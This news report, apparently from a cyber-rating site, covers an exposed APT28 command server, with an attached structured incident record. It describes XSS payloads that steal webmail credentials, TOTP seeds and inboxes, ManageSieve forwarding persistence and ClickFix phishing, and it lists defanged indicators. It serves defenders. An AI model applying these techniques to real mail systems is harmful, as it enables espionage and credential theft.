FancyBear’s OPSEC Blunder Exposes Russian Espionage Operations Targeting NATO-Aligned Governments
A critical operational security (OPSEC) failure by the Russian state-backed threat group APT28 (FancyBear) has exposed a live command-and-control (C2) server containing stolen credentials, two-factor authentication (2FA) secrets, and detailed logs of ongoing cyberespionage campaigns. The breach, analyzed by researchers from Ctrl-Alt-Intel and Hunt.io, provides unprecedented visibility into the group’s tactics, infrastructure, and high-value targets across Europe.
The Exposure: A Goldmine of Stolen Data
The compromised server, hosted on Namecheap infrastructure at 203.161.50[.]145, contained an open directory with:
- 2,800+ exfiltrated emails
- 240+ credential sets, including TOTP 2FA secrets
- 140+ persistent email forwarding rules
- 11,500+ harvested contact addresses
- C2 source code, payloads, and operator logs
Victims included government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia many of which are NATO members or closely aligned with the alliance. Targets ranged from regional Ukrainian prosecutors to the Romanian Air Force and Greece’s National Defence General Staff, aligning with Russia’s strategic focus on Ukraine-related military logistics and support.
How the Attack Unfolded
FancyBear’s campaign leveraged Roundcube and SquirrelMail webmail vulnerabilities, exploiting cross-site scripting (XSS) flaws to deploy malicious JavaScript payloads. Key components included:
- "worker.js" family payloads: Silently stole credentials, exfiltrated entire inboxes, and harvested address books.
- keyTwoAuth.js: Targeted the twofactor_gauthenticator plugin, extracting TOTP seeds and recovery codes in base64, enabling long-term 2FA bypass.
- addRedirectMailBox.js: Abused Roundcube’s ManageSieve to create persistent email forwarding rules, ensuring continued access even if the initial XSS vector was closed.
Phishing emails directed victims to a fake Google Docs domain (docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com), which used a fake reCAPTCHA (ClickFix) to deliver Metasploit payloads tied to the same C2 server.
A Rare Glimpse into APT28’s Operations
Despite prior exposure by CERT-UA in late 2024 linking the same IP to Roundcube exploitation and ClickFix phishing FancyBear continued operating from the server for nearly 500 days, into early 2026. The root cause was a basic but critical OPSEC mistake: leaving HTTP open directories exposed while staging payloads and exfiltrated data.
Telemetry from Censys and Hunt.io revealed multiple open directories on port 8889 between January and March 2026, allowing defenders to download the full toolkit, observe campaign evolution, and track operator behavior in near real time.
Geopolitical and Defensive Implications
The victim profile reinforces APT28’s strategic targeting, focusing on nations providing military aid, training, or logistical support to Ukraine. The campaign overlaps with ESET’s "Operation RoundPress" and CERT-UA’s ClickFix advisories, further solidifying attribution to GRU-linked FancyBear.
For defenders, the incident highlights vulnerabilities in webmail platforms (Roundcube, SquirrelMail), the risks of unhardened ManageSieve integrations, and the need to monitor for indicators like 203.161.50[.]145 and zhblz[.]com. Most critically, it demonstrates that even highly resourced state actors can make simple OPSEC errors, creating rare opportunities for disruption.
Source: https://gbhackers.com/fancybear-server-leak/
Ministry of National Defence - Romania cybersecurity rating report: https://www.rankiteo.com/company/ministry-of-national-defence-romania
Hellenic Army cybersecurity rating report: https://www.rankiteo.com/company/hellenic-army-es
Greenbrier Government Solutions cybersecurity rating report: https://www.rankiteo.com/company/greenbrier-government-solutions
"id": "MINHELGRE1773843944",
"linkid": "ministry-of-national-defence-romania, hellenic-army-es, greenbrier-government-solutions",
"type": "Cyber Attack",
"date": "3/2026",
"severity": "100",
"impact": "8",
"explanation": "Attack that could bring to a war"{'affected_entities': [{'industry': 'Defense, Military',
'location': 'Ukraine',
'name': 'Ukrainian government entities',
'type': 'Government'},
{'industry': 'Defense',
'location': 'Romania',
'name': 'Romanian Air Force',
'type': 'Military'},
{'industry': 'Defense',
'location': 'Greece',
'name': 'Greece’s National Defence General Staff',
'type': 'Military'},
{'industry': 'Defense, Military',
'location': 'Bulgaria',
'name': 'Bulgarian government entities',
'type': 'Government'},
{'industry': 'Defense, Military',
'location': 'Serbia',
'name': 'Serbian government entities',
'type': 'Government'},
{'industry': 'Defense, Military',
'location': 'North Macedonia',
'name': 'North Macedonian government entities',
'type': 'Government'}],
'attack_vector': ['Phishing',
'Cross-Site Scripting (XSS)',
'Exploitation of Webmail Vulnerabilities'],
'data_breach': {'data_exfiltration': True,
'number_of_records_exposed': '2,800+ emails, 240+ credential '
'sets, 11,500+ contact addresses',
'personally_identifiable_information': 'Yes (emails, contact '
'details, credentials)',
'sensitivity_of_data': 'High (military and government '
'communications, TOTP seeds, recovery '
'codes)',
'type_of_data_compromised': ['Emails',
'Credentials',
'Two-Factor Authentication (2FA) '
'secrets',
'Contact addresses']},
'date_detected': '2026-03',
'description': 'A critical operational security (OPSEC) failure by the '
'Russian state-backed threat group APT28 (FancyBear) exposed a '
'live command-and-control (C2) server containing stolen '
'credentials, two-factor authentication (2FA) secrets, and '
'detailed logs of ongoing cyberespionage campaigns. The breach '
'provided unprecedented visibility into the group’s tactics, '
'infrastructure, and high-value targets across Europe, '
'including government and military entities in NATO-aligned '
'nations.',
'impact': {'data_compromised': '2,800+ exfiltrated emails, 240+ credential '
'sets (including TOTP 2FA secrets), 140+ '
'persistent email forwarding rules, 11,500+ '
'harvested contact addresses',
'identity_theft_risk': 'High (TOTP seeds and recovery codes '
'exposed)',
'operational_impact': 'Persistent access to sensitive government '
'and military communications, long-term '
'espionage capabilities',
'systems_affected': ['Roundcube webmail',
'SquirrelMail webmail',
'Email servers']},
'initial_access_broker': {'backdoors_established': 'Persistent email '
'forwarding rules via '
'ManageSieve',
'entry_point': 'Phishing emails with fake Google '
'Docs domains (e.g., '
'docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com)',
'high_value_targets': 'Government and military '
'entities in NATO-aligned '
'nations'},
'investigation_status': 'Ongoing (as of early 2026)',
'lessons_learned': 'Basic OPSEC failures (e.g., exposed HTTP directories) can '
'undermine even sophisticated state-sponsored cyber '
'operations. Webmail platforms like Roundcube and '
'SquirrelMail are high-value targets for espionage. '
'ManageSieve integrations must be hardened to prevent '
'persistent access via email forwarding rules.',
'motivation': 'State-sponsored espionage, military intelligence gathering',
'post_incident_analysis': {'root_causes': 'OPSEC failure (exposed HTTP open '
'directories on port 8889), '
'unpatched webmail vulnerabilities '
'(Roundcube, SquirrelMail), lack of '
'monitoring for ManageSieve abuses'},
'recommendations': ['Monitor for indicators like 203.161.50[.]145 and '
'zhblz[.]com',
'Harden webmail platforms (Roundcube, SquirrelMail) '
'against XSS and ManageSieve abuses',
'Implement enhanced monitoring for unusual email '
'forwarding rules',
'Educate users on phishing risks, especially fake '
'reCAPTCHA and Google Docs lures'],
'references': [{'source': 'Ctrl-Alt-Intel and Hunt.io'},
{'source': 'CERT-UA'},
{'source': 'ESET (Operation RoundPress)'},
{'source': 'Censys and Hunt.io telemetry'}],
'response': {'third_party_assistance': 'Ctrl-Alt-Intel, Hunt.io, CERT-UA, '
'ESET'},
'threat_actor': 'APT28 (FancyBear)',
'title': 'FancyBear’s OPSEC Blunder Exposes Russian Espionage Operations '
'Targeting NATO-Aligned Governments',
'type': 'Cyber Espionage',
'vulnerability_exploited': ['Roundcube and SquirrelMail webmail '
'vulnerabilities',
'Cross-Site Scripting (XSS) flaws',
'ManageSieve misconfigurations']}